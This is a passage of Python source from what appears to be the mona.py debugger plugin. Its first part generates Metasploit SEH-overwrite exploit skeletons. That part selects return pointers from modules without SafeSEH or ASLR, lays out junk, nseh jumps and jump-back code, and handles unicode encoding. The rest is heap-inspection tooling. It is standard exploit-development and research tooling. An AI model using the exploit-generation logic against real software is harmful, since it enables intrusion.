if exploittype.find("network") > -1:
exploitstr += "\n print_status(\"Trying target #{target.name}...\")\n"
if exploittype.find("tcp") > -1:
exploitstr += " sock.put(buffer)\n"
exploitstr += "\n handler\n"
elif exploittype.find("udp") > -1:
exploitstr += " udp_sock.put(buffer)\n"
exploitstr += "\n handler(udp_sock)\n"
if exploittype == "fileformat":
exploitstr += "\n file_create(buffer)\n\n"
if exploittype.find("network") > -1:
exploitstr += " disconnect\n\n"
exploitstr += " end\n"
dbg.log("Metasploit 'Targets' section :")
dbg.log("------------------------------")
            dbg.logLines(targetstr)
dbg.log("")
dbg.log("Metasploit 'exploit' function :")
dbg.log("--------------------------------")
            dbg.logLines(exploitstr)
#write skeleton
objexploitfile.write(skeletonheader+"\n",exploitfile)
objexploitfile.write(skeletoninit+"\n",exploitfile)
objexploitfile.write(targetstr,exploitfile)
objexploitfile.write(skeletoninit2,exploitfile)
objexploitfile.write(exploitstr,exploitfile)
objexploitfile.write("end",exploitfile)
if isSEH:
dbg.log("[+] Attempting to create payload for SEH record overwrite...")
sehcriteria = criteria
modulecriteria["safeseh"] = False
modulecriteria["rebase"] = False
modulecriteria["aslr"] = False
modulecriteria["os"] = False
sehptr = 0
instrinfo = ""
if isSEHUnicode:
sehcriteria["unicode"] = True
if "nonull" in sehcriteria:
sehcriteria.pop("nonull")
modulecriteria["safeseh"] = False
#get SEH pointers
silent = True
ptr_counter = 0
ptr_to_get = 1
seh_pointers = findSEH(modulecriteria,sehcriteria)
jmpback = False
silent = False
if not isSEHUnicode:
#did we find a pointer ?
if len(seh_pointers) == 0:
#did we try to avoid nulls ?
dbg.log("[+] No non-null pointers found, trying 'jump back' layout now...")
if "nonull" in sehcriteria:
if sehcriteria["nonull"] == True:
sehcriteria.pop("nonull")
silent = True
ptr_counter = 0
ptr_to_get = 1
seh_pointers = findSEH(modulecriteria,sehcriteria)
silent = False
jmpback = True
if len(seh_pointers) != 0:
for ptrtypes in seh_pointers:
sehptr = seh_pointers[ptrtypes][0]
instrinfo = ptrtypes
break
else:
if len(seh_pointers) == 0:
sehptr = 0
else:
for ptrtypes in seh_pointers:
sehptr = seh_pointers[ptrtypes][0]
instrinfo = ptrtypes
break
if sehptr != 0:
ptrx = MnPointer(sehptr)
modname = ptrx.belongsTo()
mixin = ""
if not jmpback:
mixin += "#Don't forget to include the SEH mixin !\n"
mixin += "include Msf::Exploit::Seh\n\n"
skeletonheader += " include Msf::Exploit::Seh\n"
targetstr = " 'Targets' =>\n"
targetstr += " [\n"
targetstr += " [ '<fill in the OS/app version here>',\n"
targetstr += " {\n"
if not isSEHUnicode:
targetstr += " 'Ret' => 0x" + toHex(sehptr) + ", # " + instrinfo + " - " + modname + "\n"
targetstr += " 'Offset' => " + str(initialoffsetSEH) + "\n"
else:
origptr = toHex(sehptr)
#real unicode ?
unicodeptr = ""
transforminfo = ""
if origptr[0] == "0" and origptr[1] == "0" and origptr[4] == "0" and origptr[5] == "0":
unicodeptr = "\"\\x" + origptr[6] + origptr[7] + "\\x" + origptr[2] + origptr[3] + "\""
else:
#transform
transform = UnicodeTransformInfo(origptr)
transformparts = transform.split(",")
transformsubparts = transformparts[0].split(" ")
origptr = transformsubparts[len(transformsubparts)-1]
transforminfo = " #unicode transformed to 0x" + toHex(sehptr)
unicodeptr = "\"\\x" + origptr[6] + origptr[7] + "\\x" + origptr[2] + origptr[3] + "\""
targetstr += " 'Ret' => " + unicodeptr + "," + transforminfo + " # " + instrinfo + " - " + modname + "\n"
targetstr += " 'Offset' => " + str(initialoffsetSEH) + " #Unicode\n"
targetstr += " }\n"
targetstr += " ],\n"
targetstr += " ],\n"
exploitstr = " def exploit\n\n"
if exploittype.find("network") > -1:
exploitstr += "\n connect\n\n"
if not isSEHUnicode:
if not jmpback:
exploitstr += " buffer = rand_text(target['Offset']) #junk\n"
exploitstr += " buffer << generate_seh_record(target.ret)\n"
exploitstr += " buffer << payload.encoded #" + str(shellcodesizeSEH) +" bytes of space\n"
exploitstr += " # more junk may be needed to trigger the exception\n"
else:
exploitstr += " jmp_back = Rex::Arch::X86.jmp_short(-payload.encoded.length-5)\n\n"
exploitstr += " buffer = rand_text(target['Offset'] - payload.encoded.length - jmp_back.length) #junk\n"
exploitstr += " buffer << payload.encoded\n"
exploitstr += " buffer << jmp_back #jump back to start of payload.encoded\n"
exploitstr += " buffer << '\\xeb\\xf9\\x41\\x41' #nseh, jump back to jmp_back\n"
exploitstr += " buffer << [target.ret].pack('V') #seh\n"
else:
exploitstr += " nseh = <insert 2 bytes that will acts as nseh walkover>\n"
exploitstr += " align = <insert routine to align a register to begin of payload and jump to it>\n\n"
exploitstr += " padding = <insert bytes to fill space between alignment code and payload>\n\n"
exploitstr += " # Metasploit requires double encoding for unicode : Use alpha_xxxx encoder in the payload section\n"
exploitstr += " # and then manually encode with unicode inside the exploit section :\n\n"
exploitstr += " enc = framework.encoders.create('x86/unicode_mixed')\n\n"
exploitstr += " register_to_align_to = <fill in the register name you will align to>\n\n"
exploitstr += " enc.datastore.import_options_from_hash({ 'BufferRegister' => register_to_align_to })\n\n"
exploitstr += " unicodepayload = enc.encode(payload.encoded, nil, nil, platform)\n\n"
exploitstr += " buffer = rand_text(target['Offset']) #unicode junk\n"
exploitstr += " buffer << nseh #Unicode walkover friendly dword\n"
exploitstr += " buffer << target['Ret'] #Unicode friendly p/p/r\n"
exploitstr += " buffer << align\n"
exploitstr += " buffer << padding\n"
exploitstr += " buffer << unicodepayload\n"
if exploittype.find("network") > -1:
exploitstr += "\n print_status(\"Trying target #{target.name}...\")\n"
exploitstr += " sock.put(buffer)\n\n"
exploitstr += " handler\n"
if exploittype == "fileformat":
exploitstr += "\n file_create(buffer)\n\n"
if exploittype.find("network") > -1:
exploitstr += " disconnect\n\n"
exploitstr += " end\n"
if mixin != "":
dbg.log("Metasploit 'include' section :")
dbg.log("------------------------------")
dbg.logLines(mixin)
dbg.log("Metasploit 'Targets' section :")
dbg.log("------------------------------")
            dbg.logLines(targetstr)
dbg.log("")
dbg.log("Metasploit 'exploit' function :")
dbg.log("--------------------------------")
            dbg.logLines(exploitstr)
#write skeleton
objexploitfile_seh.write(skeletonheader+"\n",exploitfile_seh)
objexploitfile_seh.write(skeletoninit+"\n",exploitfile_seh)
objexploitfile_seh.write(targetstr,exploitfile_seh)
objexploitfile_seh.write(skeletoninit2,exploitfile_seh)
objexploitfile_seh.write(exploitstr,exploitfile_seh)
objexploitfile_seh.write("end",exploitfile_seh)
else:
dbg.log(" Unable to suggest a buffer layout because I couldn't find any good pointers",highlight=1)
return
#-----stacks-----#
def procStacks(args):
stacks = getStacks()
if len(stacks) > 0:
dbg.log("Stacks :")
dbg.log("--------")
for threadid in stacks:
dbg.log("Thread %s : Stack : 0x%s - 0x%s (size : 0x%s)" % (str(threadid),toHex(stacks[threadid][0]),toHex(stacks[threadid][1]),toHex(stacks[threadid][1]-stacks[threadid][0])))
else:
dbg.log("No threads/stacks found !",highlight=1)
return
#------heapstuff-----#
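# procHeap is the heap inspection entry point: it first lists every heap found in the PEB
# (with segment, LFH and encoding-key details on Win7+), then walks the heap selected with
# -h <base|default> according to -t : 'lal'/'lfh'/'fea' (frontend allocator), 'bea' (backend
# freelists), 'segments', 'chunks', 'layout' or 'all'. -v dumps chunk data and -clearcache
# drops the cached vtable knowledge.
# Illustrative usage: !mona heap -h default -t chunks -v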
def procHeap(args):
os = dbg.getOsVersion()
heapkey = 0
#first, print list of heaps
allheaps = []
try:
allheaps = dbg.getHeapsAddress()
except:
allheaps = []
dbg.log("Peb : 0x%08x, NtGlobalFlag : 0x%08x" % (dbg.getPEBAddress(),getNtGlobalFlag()))
dbg.log("Heaps:")
dbg.log("------")
if len(allheaps) > 0:
for heap in allheaps:
segments = getSegmentList(heap)
segmentlist = []
for segment in segments:
segmentlist.append(segment)
if not win7mode:
segmentlist.sort()
segmentinfo = ""
for segment in segmentlist:
segmentinfo = segmentinfo + "0x%08x" % segment + ","
segmentinfo = segmentinfo.strip(",")
segmentinfo = " : " + segmentinfo
defheap = ""
lfhheap = ""
keyinfo = ""
if heap == getDefaultProcessHeap():
defheap = "* Default process heap"
if win7mode:
iHeap = MnHeap(heap)
if iHeap.usesLFH():
lfhheapaddress = iHeap.getLFHAddress()
lfhheap = "[LFH enabled, _LFH_HEAP at 0x%08x]" % lfhheapaddress
if iHeap.getEncodingKey() > 0:
keyinfo = "Encoding key: 0x%08x" % iHeap.getEncodingKey()
dbg.log("0x%08x (%d segment(s)%s) %s %s %s" % (heap,len(segments),segmentinfo,defheap,lfhheap,keyinfo))
else:
dbg.log(" ** No heaps found")
dbg.log("")
heapbase = 0
searchtype = ""
searchtypes = ["lal","lfh","all","segments", "chunks", "layout", "fea", "bea"]
error = False
filterafter = ""
showdata = False
findvtablesize = True
expand = False
minstringlength = 32
if len(allheaps) > 0:
if "h" in args and type(args["h"]).__name__.lower() != "bool":
hbase = args["h"].replace("0x","").replace("0X","")
if not (isAddress(hbase) or hbase.lower() == "default"):
dbg.log("%s is an invalid address" % args["h"], highlight=1)
return
else:
if hbase.lower() == "default":
heapbase = getDefaultProcessHeap()
else:
heapbase = hexStrToInt(hbase)
if "t" in args:
if type(args["t"]).__name__.lower() != "bool":
searchtype = args["t"].lower().replace('"','').replace("'","")
if searchtype == "blocks":
dbg.log("** Note : type 'blocks' has been replaced with 'chunks'",highlight=1)
dbg.log("")
searchtype = "chunks"
if not searchtype in searchtypes:
searchtype = ""
else:
searchtype = ""
if "after" in args:
if type(args["after"]).__name__.lower() != "bool":
filterafter = args["after"].replace('"','').replace("'","")
if "v" in args:
showdata = True
if "expand" in args:
expand = True
if "fast" in args:
findvtablesize = False
showdata = False
if searchtype == "" and not "stat" in args:
dbg.log("Please specify a valid searchtype -t",highlight=1)
dbg.log("Valid values are :",highlight=1)
for val in searchtypes:
if val != "blocks":
dbg.log(" %s" % val,highlight=1)
error = True
if "h" in args and heapbase == 0:
dbg.log("Please specify a valid heap base address -h",highlight=1)
error = True
if "size" in args:
if type(args["size"]).__name__.lower() != "bool":
size = args["size"].lower()
if size.startswith("0x"):
minstringlength = hexStrToInt(size)
else:
minstringlength = int(size)
else:
dbg.log("Please provide a valid size -size",highlight=1)
error = True
if "clearcache" in args:
dbg.forgetKnowledge("vtableCache")
dbg.log("[+] vtableCache cleared.")
else:
dbg.log("No heaps found",highlight=1)
return
heap_to_query = []
heapfound = False
if "h" in args:
for heap in allheaps:
if heapbase == heap:
heapfound = True
heap_to_query = [heapbase]
if not heapfound:
error = True
dbg.log("0x%08x is not a valid heap base address" % heapbase,highlight=1)
else:
#show all heaps
for heap in allheaps:
heap_to_query.append(heap)
if error:
return
else:
statinfo = {}
logfile_b = ""
thislog_b = ""
logfile_l = ""
        thislog_l = ""
if searchtype == "chunks" or searchtype == "all":
logfile_b = MnLog("heapchunks.txt")
thislog_b = logfile_b.reset()
if searchtype == "layout" or searchtype == "all":
logfile_l = MnLog("heaplayout.txt")
thislog_l = logfile_l.reset()
for heapbase in heap_to_query:
mHeap = MnHeap(heapbase)
heapbase_extra = ""
frontendinfo = []
frontendheapptr = 0
frontendheaptype = 0
if win7mode:
heapkey = mHeap.getEncodingKey()
if mHeap.usesLFH():
frontendheaptype = 0x2
heapbase_extra = " [LFH] "
frontendheapptr = mHeap.getLFHAddress()
frontendinfo = [frontendheaptype,frontendheapptr]
dbg.log("")
dbg.log("[+] Processing heap 0x%08x%s" % (heapbase,heapbase_extra))
if searchtype == "fea":
if win7mode:
searchtype = "lfh"
else:
searchtype = "lal"
if searchtype == "bea":
searchtype = "freelist"
# LookAsideList
if searchtype == "lal" or (searchtype == "all" and not win7mode):
lalindex = 0
if win7mode:
dbg.log(" !! This version of the OS doesn't have a LookAside List !!")
else:
dbg.log("[+] FrontEnd Allocator : LookAsideList")
dbg.log("[+] Getting LookAsideList for heap 0x%08x" % heapbase)
# do we have a LAL for this heap ?
FrontEndHeap = mHeap.getFrontEndHeap()
if FrontEndHeap > 0:
dbg.log(" FrontEndHeap: 0x%08x" % FrontEndHeap)
fea_lal = mHeap.getLookAsideList()
dbg.log(" Nr of (non-empty) LookAside Lists : %d" % len(fea_lal))
dbg.log("")
for lal_table_entry in sorted(fea_lal.keys()):
expectedsize = lal_table_entry * 8
nr_of_chunks = len(fea_lal[lal_table_entry])
lalhead = struct.unpack('<L',dbg.readMemory(FrontEndHeap + (0x30 * lal_table_entry),4))[0]
dbg.log("LAL [%d] @0x%08x, Expected Chunksize 0x%x (%d), Flink : 0x%08x" % (lal_table_entry,FrontEndHeap + (0x30 * lal_table_entry),expectedsize,expectedsize,lalhead))
mHeap.showLookAsideHead(lal_table_entry)
dbg.log(" %d chunks:" % nr_of_chunks)
for chunkindex in fea_lal[lal_table_entry]:
lalchunk = fea_lal[lal_table_entry][chunkindex]
chunksize = lalchunk.size * 8
flag = getHeapFlag(lalchunk.flag)
data = ""
if showdata:
data = bin2hex(dbg.readMemory(lalchunk.userptr,16))
dbg.log(" ChunkPtr: 0x%08x, UserPtr: 0x%08x, Flink: 0x%08x, ChunkSize: 0x%x, UserSize: 0x%x, Userspace: 0x%x (%s) %s" % (lalchunk.chunkptr, lalchunk.userptr,lalchunk.flink,chunksize,lalchunk.usersize,lalchunk.usersize+lalchunk.remaining,flag,data))
if chunksize != expectedsize:
dbg.log(" ^^ ** Warning - unexpected size value, header corrupted ? **",highlight=True)
dbg.log("")
else:
dbg.log("[+] No LookAsideList found for this heap")
dbg.log("")
if searchtype == "lfh" or (searchtype == "all" and win7mode):
dbg.log("[+] FrontEnd Allocator : Low Fragmentation Heap")
dbg.log(" ** Not implemented yet **")
if searchtype == "freelist" or (searchtype == "all" and not win7mode):
flindex = 0
dbg.log("[+] BackEnd Allocator : FreeLists")
dbg.log("[+] Getting FreeLists for heap 0x%08x" % heapbase)
thisfreelist = mHeap.getFreeList()
thisfreelistinusebitmap = mHeap.getFreeListInUseBitmap()
bitmapstr = ""
for bit in thisfreelistinusebitmap:
bitmapstr += str(bit)
dbg.log("[+] FreeListsInUseBitmap:")
printDataArray(bitmapstr,32,prefix=" ")
# make sure the freelist is printed in the correct order
flindex = 0
while flindex < 128:
if flindex in thisfreelist:
freelist_addy = heapbase + 0x178 + (8 * flindex)
expectedsize = ">1016"
expectedsize2 = ">0x%x" % 1016
if flindex != 0:
expectedsize2 = str(8 * flindex)
expectedsize = "0x%x" % (8 * flindex)
dbg.log("[+] FreeList[%02d] at 0x%08x, Expected size: %s (%s)" % (flindex,freelist_addy,expectedsize,expectedsize2))
flindicator = 0
for flentry in thisfreelist[flindex]:
freelist_chunk = thisfreelist[flindex][flentry]
chunksize = freelist_chunk.size * 8
dbg.log(" ChunkPtr: 0x%08x, Header: 0x%x bytes, UserPtr: 0x%08x, Flink: 0x%08x, Blink: 0x%08x, ChunkSize: 0x%x (%d), Usersize: 0x%x (%d) " % (freelist_chunk.chunkptr, freelist_chunk.headersize, freelist_chunk.userptr,freelist_chunk.flink,freelist_chunk.blink,chunksize,chunksize,freelist_chunk.usersize,freelist_chunk.usersize))
if flindex != 0 and chunksize != (8*flindex):
dbg.log(" ** Header may be corrupted! **", highlight = True)
flindicator = 1
if flindex > 1 and int(bitmapstr[flindex]) != flindicator:
dbg.log(" ** FreeListsInUseBitmap mismatch for index %d! **" % flindex, highlight = True)
flindex += 1
if searchtype == "layout" or searchtype == "all":
segments = getSegmentsForHeap(heapbase)
sortedsegments = []
global vtableCache
# read vtableCache from knowledge
vtableCache = dbg.getKnowledge("vtableCache")
if vtableCache is None:
vtableCache = {}
for seg in segments:
sortedsegments.append(seg)
if not win7mode:
sortedsegments.sort()
segmentcnt = 0
minstringlen = minstringlength
blockmem = []
nr_filter_matches = 0
vablocks = []
# VirtualAllocdBlocks
vachunks = mHeap.getVirtualAllocdBlocks()
infoblocks = {}
infoblocks["segments"] = sortedsegments
if expand:
infoblocks["virtualallocdblocks"] = [vachunks]
for infotype in infoblocks:
heapdata = infoblocks[infotype]
for thisdata in heapdata:
if infotype == "segments":
seg = thisdata
segmentcnt += 1
segstart = segments[seg][0]
segend = segments[seg][1]
FirstEntry = segments[seg][2]
LastValidEntry = segments[seg][3]
datablocks = walkSegment(FirstEntry,LastValidEntry,heapbase)
tolog = "----- Heap 0x%08x%s, Segment 0x%08x - 0x%08x (%d/%d) -----" % (heapbase,heapbase_extra,segstart,segend,segmentcnt,len(sortedsegments))
if infotype == "virtualallocdblocks":
datablocks = heapdata[0]
tolog = "----- Heap 0x%08x%s, VirtualAllocdBlocks : %d" % (heapbase,heapbase_extra,len(datablocks))
logfile_l.write(" ",thislog_l)
dbg.log(tolog)
logfile_l.write(tolog,thislog_l)
sortedblocks = []
for block in datablocks:
sortedblocks.append(block)
sortedblocks.sort()
# for each block, try to get info
# object ?
# BSTR ?
# str ?
for block in sortedblocks:
showinlog = False
thischunk = datablocks[block]
unused = thischunk.unused
headersize = thischunk.headersize
flags = getHeapFlag(thischunk.flag)
userptr = block + headersize
psize = thischunk.prevsize * 8
blocksize = thischunk.size * 8
selfsize = blocksize
usersize = selfsize - unused
extratxt = ""
if infotype == "virtualallocdblocks":
selfsize = thischunk.commitsize * 8
blocksize = selfsize
usersize = selfsize - unused
nextblock = thischunk.flink
# read block into memory
blockmem = dbg.readMemory(block,blocksize)
# first, find all strings (ascii, unicode and BSTR)
asciistrings = {}
unicodestrings = {}
bstr = {}
objects = {}
asciistrings = getAllStringOffsets(blockmem,minstringlen)
# determine remaining subsets of the original block
remaining = {}
curpos = 0
for stringpos in asciistrings:
if stringpos > curpos:
remaining[curpos] = stringpos - curpos
curpos = asciistrings[stringpos]
if curpos < blocksize:
remaining[curpos] = blocksize
# search for unicode in remaining subsets only - tx for the regex help Turboland !
for remstart in remaining:
remend = remaining[remstart]
thisunicodestrings = getAllUnicodeStringOffsets(blockmem[remstart:remend],minstringlen,remstart)
# append results to master list
for tus in thisunicodestrings:
unicodestrings[tus] = thisunicodestrings[tus]
# check each unicode, maybe it's a BSTR
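                            # a BSTR stores its length (in bytes) in the 4 bytes right before the string data,
                            # so if the dword just in front of a unicode string matches the string's byte length,
                            # treat it as a BSTR rather than a plain unicode string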
tomove = []
for unicodeoffset in unicodestrings:
delta = unicodeoffset
size = (unicodestrings[unicodeoffset] - unicodeoffset)/2
if delta >= 4:
maybesize = struct.unpack('<L',blockmem[delta-3:delta+1])[0] # it's an offset, remember ?
if maybesize == (size*2):
tomove.append(unicodeoffset)
bstr[unicodeoffset] = unicodestrings[unicodeoffset]
for todel in tomove:
del unicodestrings[todel]
# get objects too
# find all unique objects
# again, just store offset
objects = {}
orderedobj = []
if __DEBUGGERAPP__ == "WinDBG":
nrlines = int(float(blocksize) / 4)
cmd2run = "dds 0x%08x L 0x%x" % ((block + headersize),nrlines)
output = dbg.nativeCommand(cmd2run)
outputlines = output.split("\n")
for line in outputlines:
if line.find("::") > -1 and line.find("vftable") > -1:
parts = line.split(" ")
objconstr = ""
if len(parts) > 3:
objectptr = hexStrToInt(parts[0])
cnt = 2
objectinfo = ""
while cnt < len(parts):
objectinfo += parts[cnt] + " "
cnt += 1
parts2 = line.split("::")
parts2name = ""
pcnt = 0
while pcnt < len(parts2)-1:
parts2name = parts2name + "::" + parts2[pcnt]
pcnt += 1
parts3 = parts2name.split(" ")
if len(parts3) > 3:
objconstr = parts3[3]
                                            if not (objectptr-block) in objects:
objects[objectptr-block] = [objectinfo,objconstr]
objsize = 0
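                                                # try to recover the allocation size for this object type (WinDBG only) :
                                                # disassemble <class>::CreateElement (or one of the class' operator functions)
                                                # and take the size that gets pushed right before the HeapAlloc call,
                                                # then cache the result in vtableCache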
if findvtablesize:
if not objconstr in vtableCache:
cmd2run = "u %s::CreateElement L 12" % objconstr
objoutput = dbg.nativeCommand(cmd2run)
if not "HeapAlloc" in objoutput:
cmd2run = "x %s::operator*" % objconstr
oplist = dbg.nativeCommand(cmd2run)
oplines = oplist.split("\n")
oppat = "%s::operator" % objconstr
for opline in oplines:
if oppat in opline and not "del" in opline:
lineparts = opline.split(" ")
cmd2run = "uf %s" % lineparts[0]
objoutput = dbg.nativeCommand(cmd2run)
break
if "HeapAlloc" in objoutput:
objlines = objoutput.split("\n")
lineindex = 0
for objline in objlines:
if "HeapAlloc" in objline:
if lineindex >= 3:
sizeline = objlines[lineindex-3]
if "push" in sizeline:
sizelineparts = sizeline.split("push")
if len(sizelineparts) > 1:
sizevalue = sizelineparts[len(sizelineparts)-1].replace(" ","").replace("h","")
try:
objsize = hexStrToInt(sizevalue)
                                                                # adjust to the 8-byte allocation granularity
remainsize = objsize - ((objsize / 8) * 8)
while remainsize != 0:
objsize += 1
remainsize = objsize - ((objsize / 8) * 8)
except:
#print traceback.format_exc()
objsize = 0
break
lineindex += 1
vtableCache[objconstr] = objsize
else:
objsize = vtableCache[objconstr]
# remove object entries that belong to the same object
allobjects = []
objectstodelete = []
for optr in objects:
allobjects.append(optr)
allobjects.sort()
skipuntil = 0
for optr in allobjects:
if optr < skipuntil:
objectstodelete.append(optr)
else:
objname = objects[optr][1]
objsize = 0
try:
objsize = vtableCache[objname]
except:
objsize = 0
skipuntil = optr + objsize
# remove vtable lines that are too close to each other
minvtabledistance = 0x0c
prevvname = ""
prevptr = 0
thisvname = ""
for optr in allobjects:
thisvname = objects[optr][1]
if thisvname == prevvname and (optr - prevptr) <= minvtabledistance:
if not optr in objectstodelete:
objectstodelete.append(optr)
else:
prevptr = optr
prevvname = thisvname
for vtableptr in objectstodelete:
del objects[vtableptr]
for obj in objects:
orderedobj.append(obj)
for ascstring in asciistrings:
orderedobj.append(ascstring)
for unicodestring in unicodestrings:
orderedobj.append(unicodestring)
for bstrobj in bstr:
orderedobj.append(bstrobj)
orderedobj.sort()
# print out details for this chunk
chunkprefix = ""
fieldname1 = "Usersize"
fieldname2 = "ChunkSize"
if infotype == "virtualallocdblocks":
chunkprefix = "VA "
fieldname1 = "CommitSize"
tolog = "%sChunk 0x%08x (%s 0x%x, %s 0x%x) : %s" % (chunkprefix,block,fieldname1,usersize,fieldname2,usersize+unused,flags)
if showdata:
dbg.log(tolog)
logfile_l.write(tolog,thislog_l)
previousptr = block
previoussize = 0
showinlog = False
for ptr in orderedobj:
ptrtype = ""
ptrinfo = ""
data = ""
alldata = ""
blockinfo = ""
ptrbytes = 0
endptr = 0
datasize = 0
ptrchars = 0
infoptr = block + ptr
endptr = 0
if ptr in asciistrings:
ptrtype = "String"
dataend = asciistrings[ptr]
data = blockmem[ptr:dataend]
alldata = data
ptrbytes = len(data)
ptrchars = ptrbytes
datasize = ptrbytes
if ptrchars > 100:
data = data[0:100]+"..."
blockinfo = "%s (Data : 0x%x/%d bytes, 0x%x/%d chars) : %s" % (ptrtype,ptrbytes,ptrbytes,ptrchars,ptrchars,data)
infoptr = block + ptr
endptr = infoptr + ptrchars - 1 # need -1
elif ptr in bstr:
ptrtype = "BSTR"
dataend = bstr[ptr]
data = blockmem[ptr:dataend].replace("\x00","")
alldata = data
ptrchars = len(data)
ptrbytes = ptrchars*2
datasize = ptrbytes+6
infoptr = block + ptr - 3
if ptrchars > 100:
data = data[0:100]+"..."
blockinfo = "%s 0x%x/%d bytes (Data : 0x%x/%d bytes, 0x%x/%d chars) : %s" % (ptrtype,ptrbytes+6,ptrbytes+6,ptrbytes,ptrbytes,ptrchars,ptrchars,data)
endptr = infoptr + ptrbytes + 6
elif ptr in unicodestrings:
ptrtype = "Unicode"
dataend = unicodestrings[ptr]
data = blockmem[ptr:dataend].replace("\x00","")
alldata = ""
ptrchars = len(data)
ptrbytes = ptrchars * 2
datasize = ptrbytes
if ptrchars > 100:
data = data[0:100]+"..."
blockinfo = "%s (0x%x/%d bytes, 0x%x/%d chars) : %s" % (ptrtype,ptrbytes,ptrbytes,ptrchars,ptrchars,data)
endptr = infoptr + ptrbytes + 2
elif ptr in objects:
ptrtype = "Object"
data = objects[ptr][0]
vtablename = objects[ptr][1]
datasize = 0
if vtablename in vtableCache:
datasize = vtableCache[vtablename]
alldata = data
if datasize > 0:
blockinfo = "%s (0x%x bytes): %s" % (ptrtype,datasize,data)
else:
blockinfo = "%s : %s" % (ptrtype,data)
endptr = infoptr + datasize
# calculate delta
slackspace = infoptr - previousptr
if endptr > 0 and not ptrtype=="Object":
if slackspace >= 0:
tolog = " +%04x @ %08x->%08x : %s" % (slackspace,infoptr,endptr,blockinfo)
else:
tolog = " @ %08x->%08x : %s" % (infoptr,endptr,blockinfo)
else:
if slackspace >= 0:
if endptr != infoptr:
tolog = " +%04x @ %08x->%08x : %s" % (slackspace,infoptr,endptr,blockinfo)
else:
tolog = " +%04x @ %08x : %s" % (slackspace,infoptr,blockinfo)
else:
tolog = " @ %08x : %s" % (infoptr,blockinfo)
if filterafter == "" or (filterafter != "" and filterafter in alldata):
showinlog = True # keep this for the entire block
if (filterafter != ""):
nr_filter_matches += 1
if showinlog:
if showdata:
dbg.log(tolog)
logfile_l.write(tolog,thislog_l)
previousptr = endptr
previoussize = datasize
# save vtableCache again
if filterafter != "":
tolog = "Nr of filter matches: %d" % nr_filter_matches
if showdata:
dbg.log("")
dbg.log(tolog)
logfile_l.write("",thislog_l)
logfile_l.write(tolog,thislog_l)
dbg.addKnowledge("vtableCache",vtableCache)
if searchtype in ["segments","all","chunks"] or "stat" in args:
segments = getSegmentsForHeap(heapbase)
dbg.log("Segment List for heap 0x%08x:" % (heapbase))
dbg.log("---------------------------------")
sortedsegments = []
for seg in segments:
sortedsegments.append(seg)
if not win7mode:
sortedsegments.sort()
vablocks = []
# VirtualAllocdBlocks
vachunks = mHeap.getVirtualAllocdBlocks()
infoblocks = {}
infoblocks["segments"] = sortedsegments
if searchtype in ["all","chunks"]:
infoblocks["virtualallocdblocks"] = [vachunks]
for infotype in infoblocks:
heapdata = infoblocks[infotype]
for thisdata in heapdata:
tolog = ""
if infotype == "segments":
# 0 : segmentstart
# 1 : segmentend
# 2 : firstentry
# 3 : lastentry
seg = thisdata
segstart = segments[seg][0]
segend = segments[seg][1]
segsize = segend-segstart
FirstEntry = segments[seg][2]
LastValidEntry = segments[seg][3]
tolog = "Segment 0x%08x - 0x%08x (FirstEntry: 0x%08x - LastValidEntry: 0x%08x): 0x%08x bytes" % (segstart,segend,FirstEntry,LastValidEntry, segsize)
if infotype == "virtualallocdblocks":
vablocks = heapdata
tolog = "Heap : 0x%08x%s : VirtualAllocdBlocks : %d " % (heapbase,heapbase_extra,len(vachunks))
#dbg.log("")
dbg.log(tolog)
if searchtype == "chunks" or "stat" in args:
try:
logfile_b.write("Heap: 0x%08x%s" % (heapbase,heapbase_extra),thislog_b)
#logfile_b.write("",thislog_b)
logfile_b.write(tolog,thislog_b)
except:
pass
if infotype == "segments":
datablocks = walkSegment(FirstEntry,LastValidEntry,heapbase)
else:
datablocks = heapdata[0]
tolog = " Nr of chunks : %d " % len(datablocks)
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
if len(datablocks) > 0:
tolog = " _HEAP_ENTRY psize size unused UserPtr UserSize"
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
sortedblocks = []
for block in datablocks:
sortedblocks.append(block)
sortedblocks.sort()
nextblock = 0
segstatinfo = {}
for block in sortedblocks:
showinlog = False
thischunk = datablocks[block]
unused = thischunk.unused
headersize = thischunk.headersize
flagtxt = getHeapFlag(thischunk.flag)
if not infotype == "virtualallocdblocks" and "virtallocd" in flagtxt.lower():
flagtxt += " (LFH)"
flagtxt = flagtxt.replace("Virtallocd","Internal")
userptr = block + headersize
psize = thischunk.prevsize * 8
blocksize = thischunk.size * 8
selfsize = blocksize
usersize = selfsize - unused
extratxt = ""
if infotype == "virtualallocdblocks":
nextblock = thischunk.flink
extratxt = " (0x%x bytes committed)" % (thischunk.commitsize * 8)
else:
nextblock = block + blocksize
if not "stat" in args:
tolog = " %08x %05x %05x %05x %08x %08x (%d) (%s) %s" % (block,psize,selfsize,unused,block+headersize,usersize,usersize,flagtxt,extratxt)
dbg.log(tolog)
logfile_b.write(tolog,thislog_b)
else:
if not usersize in segstatinfo:
segstatinfo[usersize] = 1
else:
segstatinfo[usersize] += 1
if nextblock > 0 and nextblock < LastValidEntry:
if not "stat" in args:
nextblock -= headersize
restbytes = LastValidEntry - nextblock
tolog = " 0x%08x - 0x%08x (end of segment) : 0x%x (%d) uncommitted bytes" % (nextblock,LastValidEntry,restbytes,restbytes)
dbg.log(tolog)
logfile_b.write(tolog,thislog_b)
if "stat" in args:
statinfo[segstart] = segstatinfo
# show statistics
orderedsizes = []
totalalloc = 0
for thissize in segstatinfo:
orderedsizes.append(thissize)
totalalloc += segstatinfo[thissize]
orderedsizes.sort(reverse=True)
tolog = " Segment Statistics:"
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
for thissize in orderedsizes:
nrblocks = segstatinfo[thissize]
percentage = (float(nrblocks) / float(totalalloc)) * 100
tolog = " Size : 0x%x (%d) : %d chunks (%.2f %%)" % (thissize,thissize,nrblocks,percentage)
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
tolog = " Total chunks : %d" % totalalloc
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
tolog = ""
try:
logfile_b.write(tolog,thislog_b)
except:
pass
dbg.log("")
dbg.log("")
if "stat" in args and len(statinfo) > 0:
tolog = "Global statistics"
dbg.log(tolog)
try:
logfile_b.write(tolog,thislog_b)
except:
pass
globalstats = {}
allalloc = 0
for seginfo in statinfo:
segmentstats = statinfo[seginfo]
for size in segmentstats:
allalloc += segmentstats[size]
if not size in globalstats:
globalstats[size] = segmentstats[size]
else:
globalstats[size] += segmentstats[size]
orderedstats = []
for size in globalstats:
orderedstats.append(size)
